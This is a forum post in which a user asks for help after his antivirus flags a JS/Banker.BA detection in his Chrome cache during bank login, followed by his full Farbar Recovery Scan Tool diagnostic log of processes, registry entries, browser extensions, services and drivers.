JS/Banker.BA (please help)


  • This topic is locked
9 replies to this topic

#1 GiakMind

GiakMind

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Roma, Italy
  • Local time:01:43 AM

Posted 12 August 2015 - 01:07 PM

Today, once I entered my password manually (I don't keep it saved) and pressed OK to log in to my bank account, Avira sent me a notification for this virus "JS/Banker.BA" in C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Cache\f_0207ab
Once it was put in quarantine, I tried to repeat the process and it appeared again, in the exact same folder.
Is my password in serious danger? What do you suggest I do? Try to set another password from another PC?
 
Anyway, I attached FRST logs. Please, help me ASAP :(

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:11-08-2015 02
Ran by Gianluca (administrator) on GIANLUCA-PC (12-08-2015 20:01:23)
Running from D:\Download
Loaded Profiles: Gianluca (Available Profiles: Gianluca)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Italiano (Italia)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\LogiShrd\LVMVFM\UMVPFSrv.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
() C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
() C:\Program Files (x86)\ASUS\AAHM\1.00.13\aaHMSvc.exe
() C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(HP) C:\Windows\System32\HPSIsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Arobas Music) C:\Program Files (x86)\Guitar Pro 5\GP5.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avcenter.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11545192 2010-11-02] (Realtek Semiconductor)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [730416 2015-06-18] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Avira Systray] => C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe [134368 2015-07-02] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53288576 2015-06-29] (Skype Technologies S.A.)
HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\...\Run: [Google Update] => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe [107912 2014-10-24] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it/
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll [2015-05-16] (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2010-10-27] (Atheros Commnucations)
BHO-x32: Guida per l'accesso a Windows Live ID -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-05-16] (Oracle Corporation)
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2011-06-21] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2011-06-21] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2011-06-21] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2011-06-21] (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 62.94.0.41 62.94.0.42
Tcpip\..\Interfaces\{7663439B-6298-43A5-9DA7-975D178A3E1E}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{95EA0000-E5C6-49C9-B36B-D0294C8C8227}: [DhcpNameServer] 62.94.0.41 62.94.0.42
Tcpip\..\Interfaces\{B53171CC-A761-4D0C-9E83-9148DB0AEF08}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{C4FB4A32-AE7D-4D9E-9FB9-F76219ECB3A9}: [DhcpNameServer] 62.94.0.41 62.94.0.42

FireFox:
========
FF ProfilePath: C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default
FF Homepage: hxxp://www.google.it/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_209.dll [2015-08-10] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-08-10] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2011-07-14] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2011-07-19] (Foxit Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-05-16] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-05-16] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin HKU\S-1-5-21-1973368479-3414220156-1287075655-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Gianluca\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll [2014-07-24] (Skype Limited)
FF Plugin HKU\S-1-5-21-1973368479-3414220156-1287075655-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin HKU\S-1-5-21-1973368479-3414220156-1287075655-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll [2012-12-03] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll [2012-12-03] (Apple Inc.)
FF Extension: Avira Browser Safety - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\abs@avira.com [2015-08-10]
FF Extension: Firebug - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\firebug@software.joehewitt.com.xpi [2012-10-01]
FF Extension: Video DownloadHelper - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2015-03-17]
FF Extension: Adblock Plus - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-10-01]
FF Extension: QuickJava - C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\Extensions\{E6C1199F-E687-42da-8C24-E7770CC3AE66}.xpi [2015-05-16]

Chrome:
=======
CHR Profile: C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-09-17]
CHR Extension: (Google Drive) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-09-17]
CHR Extension: (YouTube) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-01-26]
CHR Extension: (Google Search) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-01-26]
CHR Extension: (AdBlock) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2013-09-17]
CHR Extension: (Hola Better Internet) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2015-01-06]
CHR Extension: (Bookmark Manager) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-04-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-04-16]
CHR Extension: (Google Wallet) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-01-26]
CHR Profile: C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Docs) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-07]
CHR Extension: (Google Drive) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-05-07]
CHR Extension: (YouTube) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-05-07]
CHR Extension: (Google Search) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-05-07]
CHR Extension: (AdBlock) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-05-08]
CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2015-05-07]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-05-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-05-07]
CHR Extension: (Gmail) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-07]
CHR Profile: C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2
CHR Extension: (Google Slides) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-05-07]
CHR Extension: (Google Docs) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-07]
CHR Extension: (Google Drive) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-05-07]
CHR Extension: (YouTube) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-05-07]
CHR Extension: (Google Search) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-05-07]
CHR Extension: (Google Sheets) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-05-07]
CHR Extension: (Avira Browser Safety) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2015-05-07]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-05-07]
CHR Extension: (Google Wallet) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-05-07]
CHR Extension: (Gmail) - C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-07]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - https://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [827184 2015-06-18] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [450808 2015-06-18] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [450808 2015-06-18] (Avira Operations GmbH & Co. KG)
S4 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\AVWEBGRD.EXE [1187336 2015-06-18] (Avira Operations GmbH & Co. KG)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe [918144 2010-11-03] ()
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.13\aaHMSvc.exe [915584 2010-12-02] ()
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe [586880 2010-10-21] ()
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [52896 2010-10-27] (Atheros Commnucations) [File not signed]
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [218816 2015-07-02] (Avira Operations GmbH & Co. KG)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2014-11-05] ()
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 amdkmpfd; C:\Windows\System32\DRIVERS\amdkmpfd.sys [62152 2014-10-28] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-24] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2010-08-03] ()
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [153256 2015-06-18] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [132656 2015-06-18] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-11-29] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [44088 2015-03-10] (Avira Operations GmbH & Co. KG)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2015-05-14] (Malwarebytes Corporation)
S3 mvusbews; C:\Windows\System32\Drivers\mvusbews.sys [20480 2012-09-26] (Marvell Semiconductor, Inc.)
S3 usbrndis6; C:\Windows\System32\DRIVERS\usb80236.sys [19968 2009-07-14] (Microsoft Corporation)
S3 catchme; \??\C:\54665465465322111\catchme.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-08-12 19:51 - 2015-08-12 19:51 - 00000000 ____D C:\AdwCleaner
2015-08-11 00:48 - 2015-08-11 00:49 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-08-12 20:01 - 2015-05-07 20:38 - 00000000 ____D C:\FRST
2015-08-12 19:38 - 2014-01-19 16:10 - 00000000 ____D C:\Program Files (x86)\Steam
2015-08-12 19:37 - 2012-01-26 14:33 - 00001172 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA.job
2015-08-12 19:13 - 2012-03-25 22:03 - 00001190 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA.job
2015-08-12 16:13 - 2012-03-25 22:03 - 00001168 _____ C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core.job
2015-08-12 15:41 - 2010-11-21 17:30 - 00743158 _____ C:\Windows\system32\perfh010.dat
2015-08-12 15:41 - 2010-11-21 17:30 - 00147840 _____ C:\Windows\system32\perfc010.dat
2015-08-12 15:41 - 2009-07-14 07:13 - 01665802 _____ C:\Windows\system32\PerfStringBackup.INI
2015-08-12 15:36 - 2013-12-07 16:31 - 00000000 ____D C:\Users\Gianluca\AppData\Roaming\Skype
2015-08-12 14:39 - 2015-05-19 21:41 - 00000176 _____ C:\Windows\SysWOW64\msvcsv60.dll
2015-08-12 14:39 - 2013-03-01 14:53 - 00000176 _____ C:\Windows\SysWOW64\w3data.vss
2015-08-12 14:39 - 2013-03-01 14:53 - 00000176 _____ C:\Windows\msocreg32.dat
2015-08-12 13:19 - 2011-07-09 12:55 - 01974158 _____ C:\Windows\WindowsUpdate.log
2015-08-12 13:15 - 2014-11-26 10:40 - 00000266 _____ C:\Windows\Tasks\AutoKMS.job
2015-08-12 13:15 - 2012-02-12 17:22 - 00799029 _____ C:\Windows\setupact.log
2015-08-12 13:15 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-08-11 10:37 - 2012-01-26 14:33 - 00001120 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core.job
2015-08-11 10:36 - 2012-10-01 17:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-08-11 10:36 - 2012-04-02 13:49 - 00205338 _____ C:\Windows\PFRO.log
2015-08-10 12:15 - 2012-04-09 20:35 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-08-10 12:15 - 2011-07-09 17:03 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-08-08 23:52 - 2013-12-12 23:31 - 00000000 ____D C:\ProgramData\Package Cache
2015-08-08 23:52 - 2013-08-13 00:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-07-22 14:45 - 2011-07-10 16:55 - 00000000 ____D C:\Users\Gianluca\AppData\Local\CrashDumps
2015-07-16 10:32 - 2012-01-26 14:33 - 00004152 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA
2015-07-16 10:32 - 2012-01-26 14:33 - 00003756 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core
2015-07-15 09:46 - 2014-11-10 16:32 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-07-15 09:45 - 2013-12-07 16:30 - 00000000 ____D C:\ProgramData\Skype
2015-07-14 16:52 - 2013-12-07 18:19 - 00000000 ____D C:\Users\Gianluca\AppData\Local\Pinnacle
2015-07-14 15:30 - 2013-12-07 18:35 - 00007680 _____ C:\Users\Gianluca\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

==================== Files in the root of some directories =======

2012-11-18 16:04 - 2012-11-18 16:04 - 0000132 _____ () C:\Users\Gianluca\AppData\Roaming\Adobe PNG Format CS5 Prefs
2013-12-07 18:35 - 2015-07-14 15:30 - 0007680 _____ () C:\Users\Gianluca\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-14 19:05 - 2015-05-14 19:05 - 0000218 _____ () C:\Users\Gianluca\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\Gianluca\AppData\Local\Temp\avgnt.exe
C:\Users\Gianluca\AppData\Local\Temp\Quarantine.exe
C:\Users\Gianluca\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
